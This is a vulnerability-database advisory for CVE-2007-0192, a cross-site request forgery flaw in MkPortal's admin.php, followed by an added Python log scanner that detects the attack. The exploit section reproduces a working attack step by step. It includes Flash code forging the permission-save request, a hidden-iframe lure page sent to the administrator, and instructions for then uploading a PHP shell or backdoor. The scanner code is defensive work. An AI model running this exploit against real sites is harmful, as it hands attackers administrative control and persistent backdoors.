MkPortal 'admin.php' Cross-Site Request Forgery Vulnerability

Vulnerability ID 1192149 Vulnerability type Unknown
Published 2007-01-12 Updated 2007-01-12
CVE number CVE-2007-0192 CNNVD-ID CNNVD-200701-176
Platform N/A CVSS score 7.5
|Vulnerability sources
https://www.securityfocus.com/bid/86764
https://cxsecurity.com/issue/WLB-2007010046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-176
|Vulnerability details
A cross-site request forgery vulnerability exists in the save_main operation of the ad_perms section of MKPortal's admin.php. A remote attacker can modify privilege settings, for example by calling getURL against admin.php from within a .swf file; this is also known as the "All Guests are Admin" attack.
|Vulnerability EXP
MkPortal "All Guests are Admin" Exploit

Vulnerability discovered and exploited by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main",
 "_self", "POST");

Translate "Save+Permissions" in MKPortal language.
Example: "Salva+questi+permessi" for Italian sites.

Then upload the swf file to a webserver and create an html page like this:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here</p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
</body>
</html>

Now send the html page to MKPortal administrator.
When the admin opens the page, all guests will be able to administer MKPortal.

So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php

and paste a php shell or a backdoor.
You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.

Translate "page" in MKPortal language.
Example: "pagina" for Italian sites.
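The attack above reaches admin.php through the administrator's own browser from a page on another site, so in the portal's web-server access log the permission save arrives as a POST whose Referer is missing or names a foreign host. The following Python scan over constructed combined-format log lines flags exactly that shape; it is an added example for defenders, not code from the advisory or from MKPortal, and the hosts portal.example, lure.example and the client addresses are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" access-log format; constructed for this example.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def is_perm_save(target):
    """True when the request line targets admin.php?ind=ad_perms&op=save_main."""
    parsed = urlparse(target)
    if not parsed.path.endswith("/admin.php"):
        return False
    query = parse_qs(parsed.query)
    return query.get("ind") == ["ad_perms"] and query.get("op") == ["save_main"]

def suspicious_perm_saves(lines, site_host):
    """Return (time, client, referer) for POSTs to the permission-save action whose
    Referer is absent or names another host. A Flash movie or iframe on a third-party
    page produces exactly that shape; a Referer can also be stripped by privacy tooling,
    so a hit is a lead to reconcile with the admin's own activity, not proof on its own."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_perm_save(m["target"]):
            continue
        referer = m["referer"]
        referer_host = urlparse(referer).hostname if referer not in ("", "-") else None
        if referer_host != site_host:
            hits.append((m["time"], m["client"], referer))
    return hits

# Constructed sample: portal.example hosts MKPortal; 203.0.113.5 is the admin's own browser.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2007:10:00:01 +0000] "POST /mkportal/admin.php?ind=ad_perms&op=save_main HTTP/1.1" 200 512 "http://portal.example/mkportal/admin.php?ind=ad_perms" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2007:10:07:42 +0000] "POST /mkportal/admin.php?ind=ad_perms&op=save_main HTTP/1.1" 200 512 "http://lure.example/news.html" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2007:10:07:43 +0000] "POST /mkportal/admin.php?ind=ad_perms&op=save_main HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2007:10:08:00 +0000] "GET /mkportal/admin.php?ind=ad_perms HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jan/2007:10:09:15 +0000] "POST /mkportal/index.php?ind=news&op=comment HTTP/1.1" 302 0 "http://lure.example/news.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_perm_saves(SAMPLE_LOG, "portal.example"):
        print("cross-site permission save:", hit)
```

The same-site first line is accepted; the second and third lines (foreign and absent Referer) are reported, and the GET and the unrelated POST are ignored.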
|Affected products
MKPortal MKPortal 1.0.1 Final
|References

Source: BUGTRAQ
Name: 20070104 MkPortal "All Guests are Admin" Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/455894/100/100/threaded
Source: OSVDB
Name: 33400
Link: http://osvdb.org/33400
Source: SREASON
Name: 2137
Link: http://securityreason.com/securityalert/2137